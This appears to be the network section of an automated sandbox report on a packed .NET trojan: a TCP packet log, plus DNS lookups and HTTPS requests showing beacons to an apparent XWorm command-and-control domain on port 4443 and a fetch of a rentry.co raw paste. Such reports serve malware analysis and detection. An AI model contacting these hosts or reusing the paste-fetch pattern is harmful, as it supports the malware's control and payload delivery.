                                                                                        Oct 18, 2024 12:44:20.394707918 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:20.394767046 CEST60746443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:20.395004988 CEST60746443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:20.395019054 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.006903887 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.010772943 CEST60746443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.010802031 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.322101116 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.322213888 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.322292089 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.322360039 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.322557926 CEST44360746104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.322628021 CEST60746443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.322840929 CEST60746443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.323085070 CEST60746443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.350790977 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.350899935 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:21.351022959 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.354779005 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:21.354816914 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.185370922 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.187836885 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.187870979 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.507364035 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.507431984 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.507471085 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.507494926 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.507595062 CEST44360747104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.507625103 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.507626057 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.508235931 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.508235931 CEST60747443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.538794994 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.538858891 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:22.543159962 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.543159962 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:22.543217897 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:23.560029984 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:23.562174082 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:23.562187910 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118423939 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118474960 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118510962 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118516922 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.118541002 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118591070 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.118599892 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118632078 CEST44360748104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.118676901 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.119405031 CEST60748443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.145070076 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.145121098 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.145179033 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.145435095 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.145447969 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.771151066 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:24.778796911 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:24.778817892 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.098782063 CEST607454443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:25.099180937 CEST607504443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:25.103840113 CEST444360745194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.103975058 CEST444360750194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.104079008 CEST607504443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:25.117820978 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.117866039 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.117897987 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.117923021 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.118015051 CEST44360749104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.118020058 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.118020058 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.118516922 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.118782043 CEST60749443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.146850109 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.146884918 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.147140980 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.147195101 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.147202969 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.282789946 CEST607504443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:25.287965059 CEST444360750194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.518811941 CEST607504443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:25.523864985 CEST444360750194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.734849930 CEST444360750194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.734906912 CEST607504443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:25.760879993 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:25.767244101 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:25.767254114 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087598085 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087646961 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087675095 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087683916 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.087696075 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087740898 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.087747097 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087781906 CEST44360751104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.087847948 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.089315891 CEST60751443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.113688946 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.113759995 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.113852024 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.116698980 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.116715908 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.739798069 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:26.742804050 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:26.742909908 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.071785927 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.071835041 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.071861982 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.071892977 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.071935892 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.071974039 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.071993113 CEST44360752104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.072000980 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.072043896 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.072578907 CEST60752443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.104125023 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.104193926 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.104340076 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.104990959 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.105010033 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.730360031 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:27.733375072 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:27.733409882 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.086306095 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.086359978 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.086389065 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.086415052 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.086484909 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.086505890 CEST44360753104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.086523056 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.086544991 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.087142944 CEST60753443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.113560915 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.113605976 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.113720894 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.113934040 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.113943100 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.729604959 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:28.733134985 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:28.733165979 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.049134970 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.049190998 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.049222946 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.049249887 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.049277067 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.049299002 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.049335957 CEST44360754104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.050776958 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.054780960 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.058839083 CEST60754443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.111341000 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.111459017 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.114823103 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.115137100 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.115168095 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.722414970 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:29.724502087 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:29.724538088 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.284281015 CEST607504443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:30.288320065 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:30.289316893 CEST444360750194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.293349028 CEST444360756194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.293414116 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:30.334341049 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:30.339438915 CEST444360756194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.359930992 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.359982967 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.360027075 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.360048056 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.360058069 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.360121012 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.360177040 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.360214949 CEST44360755104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.360264063 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.360876083 CEST60755443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.379090071 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.379141092 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.379199982 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.379468918 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:30.379481077 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:30.471993923 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:30.477054119 CEST444360756194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.172909021 CEST444360756194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.173121929 CEST444360756194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.173154116 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:31.173964024 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:31.175261021 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.180561066 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.180591106 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.485445976 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.485495090 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.485527992 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.485553980 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.485629082 CEST44360757104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.485663891 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.485740900 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.486802101 CEST60757443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.506805897 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.506831884 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:31.507086039 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.507354021 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:31.507363081 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:32.826586962 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:32.830853939 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:32.830893993 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138560057 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138613939 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138642073 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138667107 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138694048 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.138724089 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138744116 CEST44360758104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.138750076 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.138808012 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.139529943 CEST60758443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.161010027 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.161070108 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.161222935 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.161604881 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.161619902 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.839982033 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:33.841675043 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:33.841712952 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.143727064 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.143788099 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.143821955 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.143831968 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.143861055 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.143902063 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.143908978 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.144001007 CEST44360759104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.144041061 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.144437075 CEST60759443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.160646915 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.160706043 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.160780907 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.161062002 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:34.161072969 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.765503883 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:34.958844900 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.505328894 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.505367994 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823117971 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823173046 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823201895 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823237896 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823290110 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.823333025 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823348999 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.823353052 CEST44360760104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.823398113 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.835196972 CEST60760443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.854552031 CEST60761443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.854614973 CEST44360761104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.854801893 CEST60761443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.858500957 CEST60761443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:35.858541965 CEST44360761104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.873820066 CEST607564443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:35.878779888 CEST444360756194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.878803968 CEST607624443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:35.883799076 CEST444360762194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:35.884017944 CEST607624443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:36.486310959 CEST444360762194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:44:36.486377001 CEST607624443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:44:36.487050056 CEST44360761104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:44:36.534265995 CEST60761443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:39.121426105 CEST60761443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:44:39.122071981 CEST607624443192.168.2.6194.5.152.215

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 18, 2024 12:41:36.128523111 CEST53636751.1.1.1192.168.2.6
                                                                                        Oct 18, 2024 12:41:41.083126068 CEST5011853192.168.2.61.1.1.1
                                                                                        Oct 18, 2024 12:41:41.100806952 CEST53501181.1.1.1192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.053679943 CEST5095353192.168.2.61.1.1.1
                                                                                        Oct 18, 2024 12:41:46.118530035 CEST53509531.1.1.1192.168.2.6
                                                                                        Oct 18, 2024 12:42:41.270219088 CEST5336753192.168.2.61.1.1.1
                                                                                        Oct 18, 2024 12:42:41.280122042 CEST53533671.1.1.1192.168.2.6
                                                                                        Oct 18, 2024 12:43:40.989291906 CEST6457053192.168.2.61.1.1.1
                                                                                        Oct 18, 2024 12:43:40.999234915 CEST53645701.1.1.1192.168.2.6
                                                                                        Oct 18, 2024 12:43:47.489077091 CEST6344053192.168.2.61.1.1.1
                                                                                        Oct 18, 2024 12:43:47.496578932 CEST53634401.1.1.1192.168.2.6

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 18, 2024 12:41:41.083126068 CEST192.168.2.61.1.1.10x8297Standard query (0)xworm1337.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:41:46.053679943 CEST192.168.2.61.1.1.10xeae0Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:42:41.270219088 CEST192.168.2.61.1.1.10x330dStandard query (0)xworm1337.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:43:40.989291906 CEST192.168.2.61.1.1.10xd2baStandard query (0)xworm1337.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:43:47.489077091 CEST192.168.2.61.1.1.10xc460Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 18, 2024 12:41:41.100806952 CEST1.1.1.1192.168.2.60x8297No error (0)xworm1337.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:41:46.118530035 CEST1.1.1.1192.168.2.60xeae0No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:41:46.118530035 CEST1.1.1.1192.168.2.60xeae0No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:41:46.118530035 CEST1.1.1.1192.168.2.60xeae0No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:42:41.280122042 CEST1.1.1.1192.168.2.60x330dNo error (0)xworm1337.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:43:40.999234915 CEST1.1.1.1192.168.2.60xd2baNo error (0)xworm1337.ddnsgratis.com.br194.5.152.215A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:43:47.496578932 CEST1.1.1.1192.168.2.60xc460No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:43:47.496578932 CEST1.1.1.1192.168.2.60xc460No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                        Oct 18, 2024 12:43:47.496578932 CEST1.1.1.1192.168.2.60xc460No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • rentry.co

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.660605104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:41:46 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:41:47 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:41:47 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
